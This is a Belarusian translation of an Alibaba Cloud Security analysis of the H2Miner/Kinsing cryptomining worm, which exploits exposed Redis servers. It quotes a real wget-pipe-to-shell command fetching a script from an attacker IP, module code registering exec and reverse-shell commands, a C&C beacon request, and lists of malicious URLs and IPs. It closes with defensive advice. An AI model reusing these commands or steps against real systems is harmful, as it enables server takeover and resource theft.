Дзень таму адзін з сервераў майго праекту быў атакаваны падобным чарвяком. У пошуках адказу на пытанне "што ж гэта было такое?" я знайшоў цудоўны артыкул каманды Alibaba Cloud Security. Паколькі я не знайшоў гэты артыкул на хабры, то вырашыў перавесці яго спецыяльна для вас.
Уступленне
Нядаўна каманда бяспекі Alibaba Cloud выявіла раптоўны выбліск H2Miner. Гэты тып шкоднаснага чарвяка выкарыстоўвае адсутнасць аўтарызацыі або слабыя паролі для Redis у якасці шлюзаў да вашых сістэм, пасля чаго сінхранізуе свой уласны шкоднасны модуль з slave пасродкам сінхранізацыі master-slave і, нарэшце, загружае гэты шкоднасны модуль на атакаваную машыну і выконвае шкоднасныя інструкцыі.
У мінулым, напады на вашы сістэмы ў асноўным ажыццяўляліся з дапамогай метаду, які ўключае запланаваныя задачы або SSH-ключы, якія запісваліся на вашу машыну пасля ўваходу зламысніка ў Redis. На шчасце, гэты метад не атрымоўваецца выкарыстоўваць часта з-за праблем з кантролем дазволаў ці з-за розных версій сістэмы. Тым не менш, гэты метад загрузкі шкоднаснага модуля можа непасрэдна выконваць каманды атакавалага ці атрымліваць доступ да шелла, што небяспечна для вашай сістэмы.
З-за вялікай колькасці сервераў Redis, размешчаных у інтэрнэце (амаль 1 мільён), каманда бяспекі Alibaba Cloud, у якасці дружалюбнага напамінку, рэкамендуе карыстальнікам не прадастаўляць доступ да Redis з сеткі і рэгулярна правяраць надзейнасць сваіх пароляў, а таксама, ці не схільныя яны. хуткага падбору.
H2Miner
H2Miner – гэта майнінг-ботнет для сістэм, на базе Linux, які можа ўрывацца ў вашу сістэму рознымі спосабамі, уключаючы отсутсвiе аўтарызацыі ў Hadoop yarn, Docker, і ўразлівасць выдаленага выканання каманд Redis (RCE). Ботнет працуе шляхам загрузкі шкоднасных скрыптоў і шкоднасных праграм для майнінгу вашых дадзеных, гарызантальнага пашырэння нападу і падтрыманні камандна-кантрольнай (C&C) сувязі.
Redis RCE
Ведамі па гэтым пытанні падзяліўся Павел Тапаркоў на ZeroNights 2018. Пасля версіі 4.0, Redis падтрымлівае функцыю загрузкі вонкавых модуляў, якая падае карыстачам магчымасць загрузкі файлаў so, скампіляваных з дапамогай C у Redis для выканання вызначаных каманд Redis. Гэтая функцыя хоць і карысная, але ўтрымоўвае ўразлівасць, пры якой у рэжыме master-slave файлы могуць быць сінхранізаваныя з slave праз рэжым fullresync. Гэта можа быць скарыстана атакавалым для перадачы шкоднасных файлаў so. Пасля завяршэння перадачы зламыснікі падгружаюць модуль на атакаваны экзэмпляр Redis і выконваюць любую каманду.
Аналіз шкоднаснага чарвяка
Нядаўна каманда бяспекі Alibaba Cloud выявіла, што памер групы шкоднасных майнераў H2Miner раптам рэзка ўзрос. Паводле аналізу, агульны працэс узнікнення нападу выглядае наступным чынам:
H2Miner у выкарыстоўвае RCE Redis для паўнавартаснага нападу. Спачатку зламыснікі атакуюць неабароненыя сервера Redis або сервера са слабымі паролямі.
Затым яны выкарыстоўваюць каманду config set dbfilename red2.so каб змяніць імя файла. Пасля гэтага атакуючыя выконваюць каманду slaveof для ўстаноўкі адраса хаста рэплікацыі master-slave.
Калі атакаваны экзэмпляр Redis усталёўвае злучэнне master-slave са шкоднасным Redis, які прыналежыць зламысніку, атакавалы адпраўляе заражаны модуль з дапамогай каманды fullresync для сінхранізацыі файлаў. Затым файл red2.so будзе загружаны на атакаваную машыну. Пасля чаго зламыснікі выкарыстоўваюць модуль загрузкі ./red2.so каб загрузіць гэты файл so. Модуль можа выконваць каманды зламысніка або ініцыяваць зваротнае злучэнне (бэкдор) для атрымання доступу да атакаванай машыны.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Пасля выканання шкоднаснай каманды, такі як / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, зламыснік скіне імя файла рэзервовай копіі і зробіць выгрузку сістэмнага модуля, каб ачысціць сляды. Тым не менш, файл red2.so па-ранейшаму будзе заставацца на атакаванай машыне. Карыстачам рэкамендуецца звярнуць увагу на наяўнасць такога падазронага файла ў тэчцы іх асобніка Redis.
У дадатак да знішчэння некаторых шкоднасных працэсаў для крадзяжу рэсурсаў, зламыснік рушыў услед шкоднаснаму сцэнару, загрузіўшы і запусціўшы шкоднасныя файлы ў бінарным выглядзе, каб . Гэта азначае, што імя працэсу ці імя каталога, утрымоўвальнае kinsing на хасце, можа паказваць на тое, што гэтая машына была заражаная дадзеным вірусам.
Згодна з вынікамі рэверсіўнай распрацоўкі, шкоднасная праграма ў асноўным выконвае наступныя функцыі:
- Загрузка файлаў і іх выкананне
- Майнінг
- Падтрыманне сувязі C&C і выкананне каманд атакавалага
Выкарыстоўвайце masscan для знешняга сканавання, каб пашырыць уплыў. Акрамя таго, IP-адрас сервера C&C цвёрда зашыфраваны ў праграме, і атакаваны хост будзе ўзаемадзейнічаць з серверам сувязі C&C з дапамогай HTTP запытаў, дзе інфармацыя зомбі (узламанага сервера) ідэнтыфікуецца ў загалоўку HTTP.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Астатнія метады нападаў
Адрасы і спасылкі, якія выкарыстоўвае чарвяк
/kinsing
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
з&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
Савет
Па-першае, Redis не павінен быць адчынены для доступу з Інтэрнэту і павінен быць абаронены надзейным паролем. Таксама, важна, каб кліенты правяралі, адсутнасць файла red2.so у дырэкторыі Redis і отсутсвiе «kinsing» у імі файла / працэсу на хасце.
Крыніца: habr.com